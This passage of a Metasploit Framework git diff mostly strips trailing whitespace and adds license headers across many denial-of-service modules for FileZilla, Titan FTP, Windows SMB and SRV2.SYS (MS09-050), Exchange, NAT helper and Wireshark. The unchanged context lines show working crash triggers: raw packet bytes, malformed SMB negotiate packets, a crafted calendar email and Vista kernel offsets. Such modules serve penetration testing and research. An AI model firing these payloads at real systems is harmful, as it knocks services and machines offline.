MSF_LICENSE, 'Version' => '$Revision$' - )) + )) end def run diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 6292d60c8e..95359c6c79 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,15 +17,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS', 'Description' => %q{ This module exploits a denial of service flaw in the Appian - Enterprise Business Suite service. + Enterprise Business Suite service. }, - + 'Author' => [ 'guiness.stout ' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', @@ -37,17 +37,17 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Dec 17 2007' )) - + register_options([Opt::RPORT(5400),], self.class) end def run print_status('Connecting to the service...') connect - + # mod: randomize the static "saint" strings from the PoC - hdm - - req = + + req = "\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00" + @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary "\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+ "\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+ "\x00" - + print_status('Sending exploit...') sock.put(req) - + disconnect end diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index e54b9c0d5a..c20bd39baa 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FileZilla FTP Server Admin Interface Denial of Service', 'Description' => %q{ This module triggers a Denial of Service condition in the FileZilla FTP diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index 3b9056eb31..b77bae83b3 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service', 'Description' => %q{ This module triggers a Denial of Service condition in the FileZilla FTP diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index 42977bcfe7..8a63bcf615 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS', 'Description' => %q{ The Titan FTP server v6.26 build 630 can be DoS'd by diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index 91a8319407..127b76238d 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS', 'Description' => %q{ This module is a port of shinnai's script. You need diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index ca01e6061d..9753a6cee6 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS', 'Description' => %q{ You need a valid login to DoS this FTP server, but diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index c190ab6bdb..6507201f8c 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,14 +17,14 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Windows NAT Helper Denial of Service', 'Description' => %q{ This module exploits a denial of service vulnerability - within the Internet Connection Sharing service in - Windows XP. + within the Internet Connection Sharing service in + Windows XP. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2006-5614' ], ], 'DisclosureDate' => 'Oct 26 2006')) - + register_options([Opt::RPORT(53),], self.class) end @@ -46,14 +46,15 @@ class Metasploit3 < Msf::Auxiliary pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06" pkt << Rex::Text.rand_text_english(10) + "\x03" - pkt << Rex::Text.rand_text_english(3) + pkt << Rex::Text.rand_text_english(3) pkt << "\x00\x00\x01\x00\x01" - + print_status("Sending dos packet...") - + udp_sock.put(pkt) - + disconnect_udp end end + diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 82eb414374..fac8922022 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,22 +15,22 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Plug and Play Service Registry Overflow', 'Description' => %q{ This module triggers a stack overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, this module - will result in a forced reboot on Windows 2000. Obtaining + will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can - be placed at 0x00000030, 0x0030005C, or 0x005C005C. + be placed at 0x00000030, 0x0030005C, or 0x005C005C. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -43,12 +43,12 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '18830' ] ] )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']), ], self.class) - + end =begin @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary # Determine which pipe to use pipe = datastore['SMBPIPE'] - + print_status("Connecting to the SMB service...") connect() smb_login() @@ -91,12 +91,12 @@ class Metasploit3 < Msf::Auxiliary path = "HTREE\\ROOT" + ("\\" * i) # 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps) - - stubdata = + + stubdata = NDR.long(rand(0xffffffff)) + - NDR.wstring(path) + + NDR.wstring(path) + NDR.long(4) + - NDR.long(1) + + NDR.long(1) + print_status("Calling the vulnerable function...") @@ -111,8 +111,8 @@ class Metasploit3 < Msf::Auxiliary raise e end end - - disconnect + + disconnect end end diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index de3a5be595..1980695e19 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption', 'Description' => %q{ This module triggers a kernel pool corruption bug in SRV.SYS. Each - call to the mailslot write function results in a two byte return value + call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in - a slow corruption of the kernel memory pool. These two bytes are almost + a slow corruption of the kernel memory pool. These two bytes are almost always set to "\xff\xff" (a short integer with value of -1). }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -48,12 +48,12 @@ class Metasploit3 < Msf::Auxiliary 'DefaultAction' => 'Attack', 'DisclosureDate' => 'Jul 11 2006' )) - + register_options( [ OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']), ], self.class) - + end # MAILSLOT: HydraLsServer @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary case action.name when 'Attack' - + print_status("Mangling the kernel, two bytes at a time..."); connect @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Exception => e - if (i == 1) + if (i == 1) print_status("Failed to write any data to the mailslot: #{e}") break end @@ -96,8 +96,8 @@ class Metasploit3 < Msf::Auxiliary # Errors: # 0xc0000034 = object not found - # 0xc0000205 = insufficient resources (too much data) - + # 0xc0000205 = insufficient resources (too much data) + end disconnect diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index ac3131dac8..f2d6f7c16a 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null', 'Description' => %q{ This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary ['BID', '19215'], ] )) - + end def run @@ -52,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary 1.upto(5) do |i| print_status("Sending bad SMB transaction request #{i}..."); self.simple.client.trans_nonull( - "\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}", - '', - Rex::Text.rand_text_alphanumeric(rand(16)+1), - 3, - [1,0,1].pack('vvv'), + "\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}", + '', + Rex::Text.rand_text_alphanumeric(rand(16)+1), + 3, + [1,0,1].pack('vvv'), true ) end diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index a1b97287a2..e68e8e7643 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -1,10 +1,21 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset', 'Description' => %q{ This module exploits a denial of service vulnerability in the @@ -14,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ ['MSB', 'MS09-001'], ['OSVDB', '48153'], @@ -49,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt['Payload'].v['ShareAccess'] = 7 pkt['Payload'].v['CreateOptions'] = 0x400040 - pkt['Payload'].v['Impersonation'] = 2 + pkt['Payload'].v['Impersonation'] = 2 pkt['Payload'].v['Disposition'] = 1 pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 57eae8c0ad..e7cfd719d8 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', 'Description' => %q{ This module exploits an out of bounds function table dereference in the SMB @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2009-3103'], ['BID', '36299'], @@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(445), OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff]) ], self.class) - + end def run connect() - + # The SMB 2 dialect must be there dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002'] data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending request and waiting for a reply...") sock.put(pkt.to_s) r = sock.get_once - + if(not r) print_status("The target system has likely crashed") else print_status("Response received: #{r.inspect}") end - + disconnect() end @@ -95,11 +95,11 @@ end 0x76 = ExAllocatePoolWithTag 0x77 = ExFreePool 0x86 = ExAllocatePoolWithTag - 0x87 = ExFreePoo + 0x87 = ExFreePoo 0x96 = ExAllocatePoolWithTag - 0x97 = ExFreePoo + 0x97 = ExFreePoo 0xa6 = ExAllocatePoolWithTag - 0xa7 = ExFreePoo + 0xa7 = ExFreePoo 0xb9 = BugCheckEx 0xc7 = SrvBalanceCredits 0xdf = SrvNetStatistics data @@ -114,10 +114,10 @@ end 0x0179 = SrvProcessOplockBreakTimer 0x0185 = L"XactSrv" 0x01f8 = WppTraceCallback - - + + Offsets on Vista SP1 (no updates) x86: - + 0x64 = mov esp, ebp; pop ebp, ret 0xde = pool with tag @@ -154,6 +154,6 @@ end 734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe 760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c 804 -> 830ffc7d - 0000001722268b3e012004020010c01c - + =end diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index 9fbaf3f986..e8483499bd 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,54 +22,54 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference', 'Description' => %q{ - This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing - an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. + This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing + an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050. }, 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3103'], [ 'OSVDB', '57799' ], [ 'MSB', 'MS09-050' ], ] )) - + register_options( [ Opt::RPORT( 445 ) ], self.class ) end def run print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." ) connect - + dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ] - + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' ) data += "A" * 128 - + packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct - + packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE packet['Payload']['SMB'].v['Flags1'] = 0x18 packet['Payload']['SMB'].v['Flags2'] = 0xC853 packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF packet['Payload'].v['Payload'] = data - + packet = packet.to_s - + print_status( "Sending the exploit packet (#{packet.length} bytes)..." ) sock.put( packet ) - + response = sock.get_once - + if( not response ) print_status( "No response. The target system has probably crashed." ) else print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" ) end - + disconnect end diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index bf4d7c9943..09ec4417a3 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference', 'Description' => %q{ This module triggers a NULL dereference in svchost.exe on - all current versions of Windows that run the RRAS service. This + all current versions of Windows that run the RRAS service. This service is only accessible without authentication on Windows XP - SP1 (using the SRVSVC pipe). + SP1 (using the SRVSVC pipe). }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -44,18 +44,18 @@ class Metasploit3 < Msf::Auxiliary 'DefaultAction' => 'Attack', 'DisclosureDate' => 'Jun 14 2006' )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']), ], self.class) - + end def run connect smb_login - + case action.name when 'Attack' @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary dcerpc_bind(handle) print_status("Bound to #{handle} ...") stb = [0, 0, 0, 0].pack('V*') - + print_status("Calling the vulnerable function...") begin dcerpc.call(0x0C, stb) @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary raise e end end - + end disconnect diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index c54b618b37..81fcdc0416 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -1,10 +1,9 @@ - ## # $Id$ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,19 +15,19 @@ class Metasploit3 < Msf::Auxiliary include Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS', 'Description' => %q{ This module exploits a flaw in Windows Vista that allows a remote unauthenticated attacker to disable the SMB service. This vulnerability was silently fixed in Microsoft Vista Service Pack 1. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' )) - + register_options([Opt::RPORT(445)], self.class) end @@ -38,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary # 100 requests ensure that the bug is reliably hit 1.upto(100) do |i| - + begin - + connect - + # 118 dialects are needed to trigger a non-response dialects = ['NT LM 0.12'] * 118 @@ -59,16 +58,16 @@ class Metasploit3 < Msf::Auxiliary sock.put(pkt.to_s) disconnect - + rescue ::Interrupt raise $! - + rescue ::Exception print_status("Error at iteration #{i}: #{$!.class} #{$!}") return end - + end end -end +end diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 7152b242f2..bf770e9d80 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MS06-019 Exchange MODPROP Heap Overflow', 'Description' => %q{ This module triggers a heap overflow vulnerability in MS @@ -42,23 +42,23 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains']) ], self.class) - + end # # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class # def run - + connect_login - modprops = ['attendee', 'categories', 'class', 'created', 'description', - 'dtstamp', 'duration', 'last-modified', + modprops = ['attendee', 'categories', 'class', 'created', 'description', + 'dtstamp', 'duration', 'last-modified', 'location', 'organizer', 'priority', 'recurrence-id', 'sequence', 'status', 'summary', 'transp', 'uid'] - + #modprops = ['dtstamp'] - + modpropshort = "" modpropbusted = "" modnum = rand(3) @@ -79,14 +79,14 @@ class Metasploit3 < Msf::Auxiliary boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8) - + # Really, the randomization above only crashes /sometimes/ - it's MUCH more # reliable, and gives crashes in better spots of you use these modprops: modpropshort = "dtstamp," modproplong = "dtstamp, dtstamp," modpropbusted = "DTSTAMP:\r\n" - + mail = "From: #{datastore['MAILFROM']}\r\n" mail << "To: #{datastore['MAILTO']}\r\n" mail << "Subject: #{datastore['SUBJECT']}\r\n" @@ -111,12 +111,12 @@ class Metasploit3 < Msf::Auxiliary mail << "END:VCALENDAR\r\n" mail << "\r\n--#{boundry}\r\n" mail << "\r\n.\r\n" - - - print_status("Sending message...") + + + print_status("Sending message...") sock.put(mail) sock.put("QUIT\r\n") - print "<< " + sock.get_once + print "<< " + sock.get_once disconnect end diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 5fcbc57643..5cb4327675 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS', 'Description' => %q{ The PacketTrap TFTP server version 2.2.5459.0 can be diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index 32d61fbdaf..35fd00528c 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -12,9 +16,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireshark chunked_encoding_dissector function DOS', 'Description' => %q{ Wireshark crash when dissecting an HTTP chunked response. @@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'], ], 'DisclosureDate' => 'February 22 2007')) - + register_options([ OptInt.new('SPORT', [true, 'The source port used to send the malicious HTTP response', 80]), OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]) @@ -50,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary n.l3.protocol = 6 n.l3.id = rand(0x10000) n.l3.ttl = 64 - + n.l4 = Racket::L4::TCP.new n.l4.dst_port = rand(65535)+1 n.l4.seq = rand(0x100000000) @@ -60,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = datastore['SPORT'].to_i n.l4.window = 3072 n.l4.payload = 